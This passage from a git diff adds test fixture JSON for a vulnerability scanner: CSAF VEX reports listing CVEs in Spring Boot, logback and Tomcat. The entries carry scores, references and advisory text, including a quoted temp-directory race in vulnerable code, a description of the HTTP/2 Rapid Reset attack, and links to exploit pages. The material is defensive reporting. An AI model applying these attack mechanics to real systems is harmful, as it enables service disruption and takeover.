log4shell-critical-remote-code-execution-vulnerability-in-h2database-console","url":"https://www.secpod.com/blog/log4shell-critical-remote-code-execution-vulnerability-in-h2database-console"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.h2database/h2@vers:maven/>=1.1.100|<2.0.206"]}],"title":"CVE-2021-42392/pkg:maven/com.h2database/h2@1.4.199?type=jar"}]} \ No newline at end of file diff --git a/test/csaf_4.json b/test/csaf_4.json new file mode 100644 index 0000000..4a22d71 --- /dev/null +++ b/test/csaf_4.json 
@@ -0,0 +1 @@
+{"document":{"aggregate_severity":{"text":"Critical"},"category":"csaf_vex","csaf_version":"2.0","lang":"en","notes":[{"category":"legal_disclaimer","text":"Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}],"publisher":{"category":"vendor","contact_details":"vendor@mcvendorson.com","name":"Vendor McVendorson","namespace":"https://appthreat.com"},"references":[{"summary":"website","url":"http://projects.spring.io/spring-boot/java-sec-code/"},{"summary":"vcs","url":"https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/java-sec-code"}],"title":"Your Title","tracking":{"current_release_date":"2024-10-04T02:01:11","id":"2024-10-04T02:01:11_v1","initial_release_date":"2024-10-04T02:01:11","revision_history":[],"status":"draft","version":"1"}},"product_tree":{"full_product_names":[{"name":"java-sec-code","product_id":"java-sec-code:1.0.0","product_identification_helper":{"purl":"pkg:maven/sec/java-sec-code@1.0.0?type=jar"}}]},"vulnerabilities":[{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of 
Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. ## Impact A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency ## Patches - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12) ## Workarounds For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting. To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. 
In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory 
cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-starter-web@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework.boot/spring-boot-starter-web@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-27772"]}],"cve":"CVE-2022-27772","cwe":{"id":"377","name":"Insecure Temporary File"},"discovery_date":"2022-07-11T20:59:02","ids":[{"system_name":"CVE Record","text":"CVE-2022-27772"},{"system_name":"GitHub Advisory","text":"GHSA-cm59-pr5q-cw85"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in org.springframework.boot:spring-boot"},{"category":"details","details":"Vulnerability Details","text":"# Temporary Directory Hijacking to Local Privilege Escalation Vulnerability in 
org.springframework.boot:spring-boot spring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method. The vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation). #### Impact Location This vulnerability impacted the following source location: ```java /** * Return the absolute temp dir for given web server. * @param prefix server name * @return the temp dir for given server. */ protected final File createTempDir(String prefix) { try { File tempDir = File.createTempFile(prefix + \".\", \".\" + getPort()); tempDir.delete(); tempDir.mkdir(); tempDir.deleteOnExit(); return tempDir; } ``` \\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177 This vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists: ```java File tmpDir =File.createTempFile(prefix + \".\", \".\" + getPort()); // Attacker knows the full path of the file that will be generated // delete the file that was created tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty. // and make a directory of the same name // SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory tmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown. 
// Attacker can write any new files to this directory that they wish. // Attacker can read any files created by this process. ``` ### Prerequisites This vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users. ### Patches This vulnerability was inadvertently fixed as a part of this patch: https://github.com/spring-projects/spring-boot/commit/667ccdae84822072f9ea1a27ed5c77964c71002d This vulnerability is patched in versions `v2.2.11.RELEASE` or later. ### Workarounds Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]},"references":[{"summary":"GitHub Advisory GHSA-cm59-pr5q-cw85","url":"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-cm59-pr5q-cw85"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"},{"summary":"Cve 
2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-27772"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.9,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"CHANGED","temporalScore":7.8,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot@vers:maven/>=1.0.0.RELEASE|<=2.2.9.RELEASE"]}],"title":"CVE-2022-27772/pkg:maven/org.springframework.boot/spring-boot@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-20883"]}],"cve":"CVE-2023-20883","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-05-26T18:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-20883"},{"system_name":"NetApp Advisory","text":"ntap-20230703-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Spring Boot Welcome Page Denial of Service"},{"category":"details","details":"Vulnerability Details","text":"# Spring Boot Welcome Page Denial of Service In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. Specifically, an application is vulnerable if all of the conditions are true: * The application has Spring MVC auto-configuration enabled. This is the case by default if Spring MVC is on the classpath. 
* The application makes use of Spring Boot's welcome page support, either static or templated. * Your application is deployed behind a proxy which caches 404 responses. Your application is NOT vulnerable if any of the following are true: * Spring MVC auto-configuration is disabled. This is true if WebMvcAutoConfiguration is explicitly excluded, if Spring MVC is not on the classpath, or if spring.main.web-application-type is set to a value other than SERVLET. * The application does not use Spring Boot's welcome page support. * You do not have a proxy which caches 404 responses. Affected Spring Products and Versions Spring Boot 3.0.0 to 3.0.6 2.7.0 to 2.7.11 2.6.0 to 2.6.14 2.5.0 to 2.5.14 Older, unsupported versions are also affected Mitigation Users of affected versions should apply the following mitigations: * 3.0.x users should upgrade to 3.0.7+ * 2.7.x users should upgrade to 2.7.12+ * 2.6.x users should upgrade to 2.6.15+ * 2.5.x users should upgrade to 2.5.15+ Users of older, unsupported versions should upgrade to 3.0.7+ or 2.7.12+. 
Workarounds: configure the reverse proxy not to cache 404 responses and/or not to cache responses to requests to the root (/) of the application."}],"product_status":{"known_affected":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-20883"},{"summary":"NetApp Advisory ntap-20230703-0008","url":"https://security.netapp.com/advisory/ntap-20230703-0008"},{"summary":"Cve 2023","url":"https://spring.io/security/cve-2023-20883"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.springframework.boot/spring-boot-autoconfigure@vers:maven/>=1.0.0.RELEASE|<=2.5.9"]}],"title":"CVE-2023-20883/pkg:maven/org.springframework.boot/spring-boot-autoconfigure@1.5.1.RELEASE?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-6378"]}],"cve":"CVE-2023-6378","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2023-11-29T12:30:16","ids":[{"system_name":"CVE Record","text":"CVE-2023-6378"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"logback serialization 
vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# logback serialization vulnerability A serialization vulnerability in logback receiver component part of logback allows an attacker to mount a Denial-Of-Service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed. See https://logback.qos.ch/manual/receivers.html"}],"product_status":{"known_affected":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]},"references":[{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-6378"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H","version":"3.1"},"products":["ch.qos.logback/logback-classic@vers:maven/>=0.2.5|<=1.2.12"]}],"title":"CVE-2023-6378/pkg:maven/ch.qos.logback/logback-classic@1.1.9?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-42550"]}],"cve":"CVE-2021-42550","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-17T20:00:50","ids":[{"system_name":"CVE Record","text":"CVE-2021-42550"},{"system_name":"NetApp Advisory","text":"ntap-20211229-0001"},{"system_name":"Siemens 
Advisory","text":"ssa-371761"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in logback"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."}],"product_status":{"known_affected":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html"},{"summary":"Seclists Exploit","url":"http://seclists.org/fulldisclosure/2022/Jul/11"},{"summary":"Siemens Advisory ssa-371761","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-371761.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-42550"},{"summary":"NetApp Advisory 
ntap-20211229-0001","url":"https://security.netapp.com/advisory/ntap-20211229-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"]}],"title":"CVE-2021-42550/pkg:maven/ch.qos.logback/logback-core@1.1.9?type=jar"},{"cve":"CVE-2023-44487","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-10-10T21:28:24","ids":[{"system_name":"Microsoft Advisory","text":"2"},{"system_name":"Hashicorp Advisory","text":"59715"},{"system_name":"Swift Advisory","text":"67764"},{"system_name":"Amazon Advisory","text":"AWS-2023-011"},{"system_name":"CVE Record","text":"CVE-2023-44487"},{"system_name":"GitHub Advisory","text":"GHSA-2m7v-gc89-fjqf"},{"system_name":"GitHub Advisory","text":"GHSA-qppj-fm5r-hxr3"},{"system_name":"GitHub Advisory","text":"GHSA-vx74-f528-fxqg"},{"system_name":"GitHub Advisory","text":"GHSA-xpw8-rcwv-8f8p"},{"system_name":"Phoronix Advisory","text":"HTTP2-Rapid-Reset-Attack"},{"system_name":"F5 Advisory","text":"K000137106"},{"system_name":"Freebsd Advisory","text":"commit"},{"system_name":"Red Hat Advisory","text":"cve-2023-44487"},{"system_name":"Qualys Advisory","text":"cve-2023-44487-http-2-rapid-reset-attack"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian 
Advisory","text":"dsa-5522"},{"system_name":"Debian Advisory","text":"dsa-5540"},{"system_name":"Debian Advisory","text":"dsa-5549"},{"system_name":"Debian Advisory","text":"dsa-5558"},{"system_name":"Debian Advisory","text":"dsa-5570"},{"system_name":"Gentoo Advisory","text":"glsa-202311-09"},{"system_name":"Google Advisory","text":"google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"system_name":"Haproxy Advisory","text":"haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"system_name":"Arstechnica Advisory","text":"how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"system_name":"Google Advisory","text":"how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"system_name":"Nginx Advisory","text":"http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"system_name":"Openssf Advisory","text":"http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"system_name":"Theregister Advisory","text":"http2_rapid_reset_zeroday"},{"system_name":"Seanmonstar Advisory","text":"hyper-http2-rapid-reset-unaffected"},{"system_name":"Darkreading Advisory","text":"internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"system_name":"Eclipse Advisory","text":"msg00181"},{"system_name":"Netlify Advisory","text":"netlify-successfully-mitigates-cve-2023-44487"},{"system_name":"Bleepingcomputer Advisory","text":"new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"system_name":"NetApp Advisory","text":"ntap-20231016-0001"},{"system_name":"NetApp Advisory","text":"ntap-20240426-0007"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0006"},{"system_name":"NetApp Advisory","text":"ntap-20240621-0007"},{"system_name":"Proxmox Bugzilla","text":"proxmox-bugzilla-4988"},{"system_name":"Litespeedtech Advisory","text":"rapid-reset-http-2-vulnerablilty"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-2242803"},{"system_name":"Suse 
Bugzilla","text":"suse-bugzilla-1216123"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP/2 Stream Cancellation Attack"},{"category":"details","details":"Vulnerability Details","text":"# HTTP/2 Stream Cancellation Attack ## HTTP/2 Rapid reset attack The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed. Abuse of this feature is called a Rapid Reset attack because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open. The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately. The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth. In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. 
For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client. Multiple software artifacts implementing HTTP/2 are affected. This advisory was originally ingested from the `swift-nio-http2` repo advisory and their original conent follows. ## swift-nio-http2 specific advisory swift-nio-http2 is vulnerable to a denial-of-service vulnerability in which a malicious client can create and then reset a large number of HTTP/2 streams in a short period of time. This causes swift-nio-http2 to commit to a large amount of expensive work which it then throws away, including creating entirely new `Channel`s to serve the traffic. This can easily overwhelm an `EventLoop` and prevent it from making forward progress. swift-nio-http2 1.28 contains a remediation for this issue that applies reset counter using a sliding window. This constrains the number of stream resets that may occur in a given window of time. Clients violating this limit will have their connections torn down. This allows clients to continue to cancel streams for legitimate reasons, while constraining malicious actors. 
## Related CVE(s) BIT-apisix-2023-44487, BIT-aspnet-core-2023-44487, BIT-contour-2023-44487, BIT-dotnet-2023-44487, BIT-dotnet-sdk-2023-44487, BIT-envoy-2023-44487, BIT-golang-2023-44487, BIT-jenkins-2023-44487, BIT-kong-2023-44487, BIT-nginx-2023-44487, BIT-nginx-ingress-controller-2023-44487, BIT-node-2023-44487, BIT-solr-2023-44487, BIT-tomcat-2023-44487, BIT-varnish-2023-44487, CVE-2023-44487"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/13/9"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/18/8"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/19/6"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/20/8"},{"summary":"Red Hat Advisory cve-2023-44487","url":"https://access.redhat.com/security/cve/cve-2023-44487"},{"summary":"Arstechnica Advisory how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size","url":"https://arstechnica.com/security/2023/10/how-ddosers-used-the-http-2-protocol-to-deliver-attacks-of-unprecedented-size"},{"summary":"Amazon Advisory AWS-2023-011","url":"https://aws.amazon.com/security/security-bulletins/AWS-2023-011"},{"summary":"Litespeedtech Advisory rapid-reset-http-2-vulnerablilty","url":"https://blog.litespeedtech.com/2023/10/11/rapid-reset-http-2-vulnerablilty"},{"summary":"Qualys Advisory 
cve-2023-44487-http-2-rapid-reset-attack","url":"https://blog.qualys.com/vulnerabilities-threat-research/2023/10/10/cve-2023-44487-http-2-rapid-reset-attack"},{"summary":"Cve 2023","url":"https://blog.vespa.ai/cve-2023-44487"},{"summary":"Proxmox Bugzilla","url":"https://bugzilla.proxmox.com/show_bug.cgi?id=4988"},{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=2242803"},{"summary":"Suse Bugzilla","url":"https://bugzilla.suse.com/show_bug.cgi?id=1216123"},{"summary":"Freebsd Advisory","url":"https://cgit.freebsd.org/ports/commit/?id=c64c329c2c1752f46b73e3e6ce9f4329be6629f9"},{"summary":"Google Advisory google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps","url":"https://cloud.google.com/blog/products/identity-security/google-cloud-mitigated-largest-ddos-attack-peaking-above-398-million-rps"},{"summary":"Google Advisory how-it-works-the-novel-http2-rapid-reset-ddos-attack","url":"https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack"},{"summary":"Hashicorp Advisory 59715","url":"https://discuss.hashicorp.com/t/hcsec-2023-32-vault-consul-and-boundary-affected-by-http-2-rapid-reset-denial-of-service-vulnerability-cve-2023-44487/59715"},{"summary":"Swift Advisory 67764","url":"https://forums.swift.org/t/swift-nio-http2-security-update-cve-2023-44487-http-2-dos/67764"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory GHSA-vx74-f528-fxqg","url":"https://github.com/advisories/GHSA-vx74-f528-fxqg"},{"summary":"GitHub Advisory GHSA-xpw8-rcwv-8f8p","url":"https://github.com/advisories/GHSA-xpw8-rcwv-8f8p"},{"summary":"GitHub Advisory GHSA-qppj-fm5r-hxr3","url":"https://github.com/apple/swift-nio-http2/security/advisories/GHSA-qppj-fm5r-hxr3"},{"summary":"GitHub Advisory 
GHSA-2m7v-gc89-fjqf","url":"https://github.com/h2o/h2o/security/advisories/GHSA-2m7v-gc89-fjqf"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo"},{"summary":"Google Mailing List","url":"https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo/m/UDd7VKQuAAAJ"},{"summary":"Cve 2023","url":"https://linkerd.io/2023/10/12/linkerd-cve-2023-44487"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/5py8h42mxfsn8l1wy6o41xwhsjlsd87q"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00023.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00024.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00047.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/11/msg00012.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2MBEPPC36UBVOZZNAXFHKLFGSLCMN5LI"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing 
